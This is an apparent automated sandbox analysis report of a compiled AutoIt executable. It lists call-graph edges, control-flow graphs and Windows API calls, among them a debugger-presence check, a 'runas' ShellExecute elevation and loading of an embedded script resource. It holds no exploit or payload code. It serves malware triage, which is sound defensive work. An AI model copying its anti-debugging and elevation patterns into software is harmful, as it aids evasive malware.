95070->95034 95071->95009 95072->95034 95074 f01f3b __NMSG_WRITE 95073->95074 95075 f01f79 95074->95075 95076 f01f6f 95074->95076 95078 f01ffa 95074->95078 95075->95041 95075->95047 95076->95075 95082 edd37a 60 API calls 95076->95082 95078->95075 95083 edd37a 60 API calls 95078->95083 95080->95044 95081->95045 95082->95076 95083->95078 95084->95061 95086 ede535 95085->95086 95087 ede547 95085->95087 95088 ede53b 95086->95088 95089 ede541 95086->95089 95090 ecbcce 48 API calls 95087->95090 95117 ede63a 95088->95117 95091 ede63a 48 API calls 95089->95091 95101 f05a81 95090->95101 95093 f05c17 95091->95093 95096 ecbf20 50 API calls 95093->95096 95094 f05ab0 95094->94900 95100 f05c25 95096->95100 95107 f05c35 Mailbox 95100->95107 95138 f05cf1 50 API calls 95100->95138 95101->95094 95136 f05a27 SetFilePointerEx ReadFile 95101->95136 95137 ecc799 48 API calls ___crtGetEnvironmentStringsW 95101->95137 95102 f340c9 95106 ede581 Mailbox 95106->94900 95107->94900 95108->94876 95109->94904 95110->94905 95111->94875 95112->94875 95113->94881 95114->94889 95115->94898 95116->94903 95118 edf4ea 48 API calls 95117->95118 95119 ede64d 95118->95119 95120 ec6b4a 48 API calls 95119->95120 95121 ede55f 95120->95121 95122 ecbf20 95121->95122 95139 ecc1c2 95122->95139 95124 ecbf66 95124->95102 95128 ecc1de MultiByteToWideChar 95124->95128 95125 ecc2e0 2 API calls 95126 ecbf31 95125->95126 95126->95124 95126->95125 95146 ecbf71 95126->95146 95129 ecc245 95128->95129 95130 ecc201 95128->95130 95131 ecbcce 48 API calls 95129->95131 95132 edf4ea 48 API calls 95130->95132 95135 ecc237 95131->95135 95133 ecc216 MultiByteToWideChar 95132->95133 95160 ecc24f 95133->95160 95135->95106 95136->95101 95137->95101 95138->95107 95140 f33e49 95139->95140 95141 ecc1d3 95139->95141 95142 ec6b4a 48 API calls 95140->95142 95141->95126 95143 f33e53 95142->95143 95144 edf4ea 48 API calls 95143->95144 95145 f33e5f 95144->95145 95147 f33d35 95146->95147 95148 ecbf85 95146->95148 95149 ec6b4a 48 API calls 95147->95149 95155 ecc3b9 95148->95155 95152 f33d40 95149->95152 95151 ecbf91 95151->95126 95153 edf4ea 48 API calls 95152->95153 95154 f33d55 ___crtGetEnvironmentStringsW 95153->95154 95156 ecc3cf 95155->95156 95159 ecc3ca ___crtGetEnvironmentStringsW 95155->95159 95157 edf4ea 48 API calls 95156->95157 95158 f33e67 95156->95158 95157->95159 95159->95151 95161 ecc25e 95160->95161 95162 ecc2d1 95160->95162 95161->95162 95164 ecc26a 95161->95164 95163 ecb18b 48 API calls 95162->95163 95169 ecc27c ___crtGetEnvironmentStringsW 95163->95169 95165 ecc274 95164->95165 95166 ecc2a2 95164->95166 95172 ecc369 48 API calls 95165->95172 95168 ec6b4a 48 API calls 95166->95168 95170 ecc2ac 95168->95170 95169->95135 95171 edf4ea 48 API calls 95170->95171 95171->95169 95172->95169 95173->94913 95174->94940 95175->94949 95176->94916 95177->94920 95178->94950 95179->94950 95180->94982 95181->94960 95182->94960 95183->94961

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 856 eeb043-eeb080 call eef8a0 859 eeb089-eeb08b 856->859 860 eeb082-eeb084 856->860 862 eeb0ac-eeb0d9 859->862 863 eeb08d-eeb0a7 call ee7bda call ee7c0e call ee6e10 859->863 861 eeb860-eeb86c call eea70c 860->861 864 eeb0db-eeb0de 862->864 865 eeb0e0-eeb0e7 862->865 863->861 864->865 868 eeb10b-eeb110 864->868 869 eeb0e9-eeb100 call ee7bda call ee7c0e call ee6e10 865->869 870 eeb105 865->870 873 eeb11f-eeb12d call ef3bf2 868->873 874 eeb112-eeb11c call eef82f 868->874 905 eeb851-eeb854 869->905 870->868 886 eeb44b-eeb45d 873->886 887 eeb133-eeb145 873->887 874->873 890 eeb7b8-eeb7d5 WriteFile 886->890 891 eeb463-eeb473 886->891 887->886 889 eeb14b-eeb183 call ee7a0d GetConsoleMode 887->889 889->886 912 eeb189-eeb18f 889->912 893 eeb7d7-eeb7df 890->893 894 eeb7e1-eeb7e7 GetLastError 890->894 896 eeb55a-eeb55f 891->896 897 eeb479-eeb484 891->897 899 eeb7e9 893->899 894->899 900 eeb565-eeb56e 896->900 901 eeb663-eeb66e 896->901 903 eeb48a-eeb49a 897->903 904 eeb81b-eeb833 897->904 909 eeb7ef-eeb7f1 899->909 900->904 910 eeb574 900->910 901->904 908 eeb674 901->908 913 eeb4a0-eeb4a3 903->913 906 eeb83e-eeb84e call ee7c0e call ee7bda 904->906 907 eeb835-eeb838 904->907 911 eeb85e-eeb85f 905->911 906->905 907->906 914 eeb83a-eeb83c 907->914 915 eeb67e-eeb693 908->915 917 eeb856-eeb85c 909->917 918 eeb7f3-eeb7f5 909->918 919 eeb57e-eeb595 910->919 911->861 920 eeb199-eeb1bc GetConsoleCP 912->920 921 eeb191-eeb193 912->921 922 eeb4e9-eeb520 WriteFile 913->922 923 eeb4a5-eeb4be 913->923 914->911 925 eeb699-eeb69b 915->925 917->911 918->904 927 eeb7f7-eeb7fc 918->927 928 eeb59b-eeb59e 919->928 929 eeb1c2-eeb1ca 920->929 930 eeb440-eeb446 920->930 921->886 921->920 922->894 924 eeb526-eeb538 922->924 931 eeb4cb-eeb4e7 923->931 932 eeb4c0-eeb4ca 923->932 924->909 933 eeb53e-eeb54f 924->933 934 eeb69d-eeb6b3 925->934 935 eeb6d8-eeb719 WideCharToMultiByte 925->935 937 eeb7fe-eeb810 call ee7c0e call ee7bda 927->937 938 eeb812-eeb819 call ee7bed 927->938 939 eeb5de-eeb627 WriteFile 928->939 940 eeb5a0-eeb5b6 928->940 941 eeb1d4-eeb1d6 929->941 930->918 931->913 931->922 932->931 933->903 942 eeb555 933->942 943 eeb6c7-eeb6d6 934->943 944 eeb6b5-eeb6c4 934->944 935->894 946 eeb71f-eeb721 935->946 937->905 938->905 939->894 951 eeb62d-eeb645 939->951 948 eeb5cd-eeb5dc 940->948 949 eeb5b8-eeb5ca 940->949 952 eeb1dc-eeb1fe 941->952 953 eeb36b-eeb36e 941->953 942->909 943->925 943->935 944->943 958 eeb727-eeb75a WriteFile 946->958 948->928 948->939 949->948 951->909 961 eeb64b-eeb658 951->961 954 eeb217-eeb223 call ee1688 952->954 955 eeb200-eeb215 952->955 956 eeb375-eeb3a2 953->956 957 eeb370-eeb373 953->957 976 eeb269-eeb26b 954->976 977 eeb225-eeb239 954->977 962 eeb271-eeb283 call ef40f7 955->962 964 eeb3a8-eeb3ab 956->964 957->956 957->964 965 eeb75c-eeb776 958->965 966 eeb77a-eeb78e GetLastError 958->966 961->919 968 eeb65e 961->968 986 eeb289 962->986 987 eeb435-eeb43b 962->987 970 eeb3ad-eeb3b0 964->970 971 eeb3b2-eeb3c5 call ef5884 964->971 965->958 973 eeb778 965->973 975 eeb794-eeb796 966->975 968->909 970->971 978 eeb407-eeb40a 970->978 971->894 990 eeb3cb-eeb3d5 971->990 973->975 975->899 981 eeb798-eeb7b0 975->981 976->962 983 eeb23f-eeb254 call ef40f7 977->983 984 eeb412-eeb42d 977->984 978->941 982 eeb410 978->982 981->915 988 eeb7b6 981->988 982->987 983->987 997 eeb25a-eeb267 983->997 984->987 991 eeb28f-eeb2c4 WideCharToMultiByte 986->991 987->899 988->909 993 eeb3fb-eeb401 990->993 994 eeb3d7-eeb3ee call ef5884 990->994 991->987 995 eeb2ca-eeb2f0 WriteFile 991->995 993->978 994->894 1001 eeb3f4-eeb3f5 994->1001 995->894 996 eeb2f6-eeb30e 995->996 996->987 1000 eeb314-eeb31b 996->1000 997->991 1000->993 1002 eeb321-eeb34c WriteFile 1000->1002 1001->993 1002->894 1003 eeb352-eeb359 1002->1003 1003->987 1004 eeb35f-eeb366 1003->1004 1004->993
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: e9c56c3d64026c76b1842a0c0c9647a1a864d5bf5c5c82a581548e1e6087ac12
                                                                                                                                                                                                                                                      • Instruction ID: f544380ad3609d180b4da7e4f57d099f5875ed85e877414895673c81ea66f556
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9c56c3d64026c76b1842a0c0c9647a1a864d5bf5c5c82a581548e1e6087ac12
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49326B75B022AC8BDB248F55DC816EAB7F5FB46314F1851D9E80AE7A81D7309E80CF52

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00EC3AA3,?), ref: 00EC3D45
                                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00EC3AA3,?), ref: 00EC3D57
                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F81148,00F81130,?,?,?,?,00EC3AA3,?), ref: 00EC3DC8
                                                                                                                                                                                                                                                        • Part of subcall function 00EC6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EC3DEE,00F81148,?,?,?,?,?,00EC3AA3,?), ref: 00EC6471
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00EC3AA3,?), ref: 00EC3E48
                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F728F4,00000010), ref: 00F31CCE
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00F81148,?,?,?,?,?,00EC3AA3,?), ref: 00F31D06
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F5DAB4,00F81148,?,?,?,?,?,00EC3AA3,?), ref: 00F31D89
                                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00EC3AA3), ref: 00F31D90
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3E6E: GetSysColorBrush.USER32(0000000F), ref: 00EC3E79
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00EC3E88
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3E6E: LoadIconW.USER32(00000063), ref: 00EC3E9E
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3E6E: LoadIconW.USER32(000000A4), ref: 00EC3EB0
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3E6E: LoadIconW.USER32(000000A2), ref: 00EC3EC2
                                                                                                                                                                                                                                                        • Part of subcall function 00EC3E6E: RegisterClassExW.USER32(?), ref: 00EC3F30
                                                                                                                                                                                                                                                        • Part of subcall function 00EC36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC36E6
                                                                                                                                                                                                                                                        • Part of subcall function 00EC36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3707
                                                                                                                                                                                                                                                        • Part of subcall function 00EC36B8: ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC371B
                                                                                                                                                                                                                                                        • Part of subcall function 00EC36B8: ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC3724
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4FFC: _memset.LIBCMT ref: 00EC5022
                                                                                                                                                                                                                                                        • Part of subcall function 00EC4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC50CB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • This is a third-party compiled AutoIt script., xrefs: 00F31CC8
                                                                                                                                                                                                                                                      • runas, xrefs: 00F31D84
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                                                                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                                                                                                                                                      • API String ID: 438480954-3287110873
                                                                                                                                                                                                                                                      • Opcode ID: 481395c940718d10f04deff74580c56691b560ae64594019dd93a6dc153a08b6
                                                                                                                                                                                                                                                      • Instruction ID: ae6bc140499d158d388efed0d9d54960bca4152c0ec9385c605a79b3aac255d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 481395c940718d10f04deff74580c56691b560ae64594019dd93a6dc153a08b6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1511631A0474CAECF11ABF0DD49FFE7BBDAB15750F00916DF50272192CA265647A722

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1350 edddc0-edde4f call ecd7f7 GetVersionExW call ec6a63 call eddfb4 call ec6571 1359 edde55-edde56 1350->1359 1360 f324c8-f324cb 1350->1360 1363 edde58-edde63 1359->1363 1364 edde92-eddea2 call eddf77 1359->1364 1361 f324e4-f324e8 1360->1361 1362 f324cd 1360->1362 1366 f324d3-f324dc 1361->1366 1367 f324ea-f324f3 1361->1367 1365 f324d0 1362->1365 1368 edde69-edde6b 1363->1368 1369 f3244e-f32454 1363->1369 1377 eddea4-eddec1 GetCurrentProcess call eddf5f 1364->1377 1378 eddec7-eddee1 1364->1378 1365->1366 1366->1361 1367->1365 1374 f324f5-f324f8 1367->1374 1375 f32469-f32475 1368->1375 1376 edde71-edde74 1368->1376 1372 f32456-f32459 1369->1372 1373 f3245e-f32464 1369->1373 1372->1364 1373->1364 1374->1366 1379 f32477-f3247a 1375->1379 1380 f3247f-f32485 1375->1380 1381 f32495-f32498 1376->1381 1382 edde7a-edde89 1376->1382 1377->1378 1401 eddec3 1377->1401 1384 eddf31-eddf3b GetSystemInfo 1378->1384 1385 eddee3-eddef7 call ede00c 1378->1385 1379->1364 1380->1364 1381->1364 1386 f3249e-f324b3 1381->1386 1387 edde8f 1382->1387 1388 f3248a-f32490 1382->1388 1390 eddf0e-eddf1a 1384->1390 1398 eddf29-eddf2f GetSystemInfo 1385->1398 1399 eddef9-eddf01 call eddff4 GetNativeSystemInfo 1385->1399 1392 f324b5-f324b8 1386->1392 1393 f324bd-f324c3 1386->1393 1387->1364 1388->1364 1394 eddf1c-eddf1f FreeLibrary 1390->1394 1395 eddf21-eddf26 1390->1395 1392->1364 1393->1364 1394->1395 1400 eddf03-eddf07 1398->1400 1399->1400 1400->1390 1404 eddf09-eddf0c FreeLibrary 1400->1404 1401->1378 1404->1390
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00EDDDEC
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00F5DC38,?,?), ref: 00EDDEAC
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00F5DC38,?,?), ref: 00EDDF01
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EDDF0C
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00EDDF1F
                                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,00F5DC38,?,?), ref: 00EDDF29
                                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,00F5DC38,?,?), ref: 00EDDF35
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3851250370-0
                                                                                                                                                                                                                                                      • Opcode ID: a23fbdbcb0f10a9975b9f497d5abbc65807d0524a758f19a284ea0a64554b776
                                                                                                                                                                                                                                                      • Instruction ID: c53e0cb3be85ee78237b63ed51b21820c5240eb9b54c9690c86dfa8bd40cf6dc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a23fbdbcb0f10a9975b9f497d5abbc65807d0524a758f19a284ea0a64554b776
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F619EB190A284DBCF15CF68D8C15E97FB4AF2A300F1989DADC45AF307C624C90ACB65

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1422 ec406b-ec4083 CreateStreamOnHGlobal 1423 ec4085-ec409c FindResourceExW 1422->1423 1424 ec40a3-ec40a6 1422->1424 1425 f34f16-f34f25 LoadResource 1423->1425 1426 ec40a2 1423->1426 1425->1426 1427 f34f2b-f34f39 SizeofResource 1425->1427 1426->1424 1427->1426 1428 f34f3f-f34f4a LockResource 1427->1428 1428->1426 1429 f34f50-f34f6e 1428->1429 1429->1426
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EC449E,?,?,00000000,00000001), ref: 00EC407B
                                                                                                                                                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EC449E,?,?,00000000,00000001), ref: 00EC4092
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00EC449E,?,?,00000000,00000001,?,?,?,?,?,?,00EC41FB), ref: 00F34F1A
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00EC449E,?,?,00000000,00000001,?,?,?,?,?,?,00EC41FB), ref: 00F34F2F
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00EC449E,?,?,00EC449E,?,?,00000000,00000001,?,?,?,?,?,?,00EC41FB,00000000), ref: 00F34F42
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                      • String ID: SCRIPT
                                                                                                                                                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                      • Opcode ID: 69e2c053aa5b38c4a5e7818b283a76fbb1216d08f91428790b8d7868505aa0ec
                                                                                                                                                                                                                                                      • Instruction ID: 99fe18d6f6e9f50bb2ac2e2c9ab77ccda75d4c1e8e73c8366ddcfe9be575fb56
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69e2c053aa5b38c4a5e7818b283a76fbb1216d08f91428790b8d7868505aa0ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A118EB5240705BFE7218B25ED49F677BB9EBC6B51F14412CFA02962E0DBB2DC01DA21
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00F32F49), ref: 00F06CB9
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00F06CCA
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F06CDA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 48322524-0
                                                                                                                                                                                                                                                      • Opcode ID: 958210efeac4d38342823f64fdb7ebdbff00cdc81dbb0c407d37dd7d67c96b20
                                                                                                                                                                                                                                                      • Instruction ID: 7991342f6d0492679578e56c70a584c731f006118b4006f88aeec94b3ba82b02
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 958210efeac4d38342823f64fdb7ebdbff00cdc81dbb0c407d37dd7d67c96b20
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23E0D83581041457E2146738EC0D4E937ACDB5633AF104709FD71C11D0E770D91075D5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ECE959
                                                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 00ECEBFA
                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ECED2E
                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00ECED3F
                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00ECED4A
                                                                                                                                                                                                                                                      • LockWindowUpdate.USER32(00000000), ref: 00ECED79
                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00ECED85
                                                                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ECED9F
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00F35270
                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00F359F7
                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00F35A05
                                                                                                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F35A19
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                                                                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                                                                                                                      • API String ID: 2641332412-570651680
                                                                                                                                                                                                                                                      • Opcode ID: 6ce659b608d9df88bddf920031ba82ba6b9f1ac38cf0a090026c38872432d6e0
                                                                                                                                                                                                                                                      • Instruction ID: 55db568c412d1b60f9ad6f438f35d0d1cb52f31216162527e3a7fa04cc43356a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ce659b608d9df88bddf920031ba82ba6b9f1ac38cf0a090026c38872432d6e0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9062E070504340CFDB24DF24C985FAAB7E4BF84714F08196DE986AB392DB72D846DB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00EF5EC3
                                                                                                                                                                                                                                                      • ___createFile.LIBCMT ref: 00EF5F04
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00EF5F2D
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00EF5F34
